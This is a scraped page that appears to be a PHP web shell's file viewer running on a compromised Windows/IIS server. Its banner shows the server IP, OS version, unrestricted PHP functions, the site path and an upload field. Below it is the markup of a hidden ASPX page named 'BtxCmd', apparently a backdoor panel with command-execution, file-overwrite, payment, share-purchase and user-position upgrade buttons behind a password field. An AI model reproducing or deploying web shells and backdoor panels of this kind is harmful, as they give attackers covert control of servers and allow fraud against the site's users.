Server IP : 103.6.199.200 / Your IP : 3.15.141.155 Web Server : Microsoft-IIS/10.0 System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586 User : EMPUSA$ ( 0) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Domains/tradepan/eura.trade-panel.com/wwwroot/ |
Upload File : |
<%@ page language="C#" autoeventwireup="true" inherits="BtxCmd, App_Web_lzmvykft" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head runat="server"> <title>Untitled Page</title> </head> <body> <form id="form1" runat="server"> <div> <asp:TextBox ID="Text01" runat="server" Height="128px" Width="631px" TextMode="MultiLine" ></asp:TextBox> <br /> <asp:Button ID="But1" runat="server" Text="Ret" OnClick="But1_Click" Width="95px" /><asp:Button ID="But2" runat="server" Text="Exc" OnClick="But2_Click" Width="124px" /> <asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="Sponsor" Width="151px" /> <asp:Button ID="Button2" runat="server" OnClick="Button2_Click" Text="Overwritting" Width="121px" /> <asp:Button ID="Button4" runat="server" Text="Payment 80%" OnClick="Button4_Click" /> <asp:Button ID="Button5" runat="server" Text="Buy Share" OnClick="Button5_Click" /> <asp:Button ID="Button3" runat="server" OnClick="Button3_Click" Text="Rev" Width="92px" /><br /> <asp:TextBox ID="txtPass" runat="server" Width="200px" TextMode="Password" ></asp:TextBox> <br /> <asp:TextBox ID="TextRet" runat="server" Height="128px" Width="631px" TextMode="MultiLine" ></asp:TextBox> <br /> UserID :<asp:TextBox ID="TxtUser" runat="server"></asp:TextBox>Position : <asp:TextBox ID="TxtPos" runat="server"></asp:TextBox><asp:Button ID="ButUp" runat="server" Text="Upgrade" OnClick="ButUp_Click" /><br /> USD <asp:TextBox ID="txtUSD" runat="server"></asp:TextBox> <asp:Button ID="Button6" runat="server" OnClick="Button6_Click" Text="ext share" Width="99px" /></div> </form> </body> </html>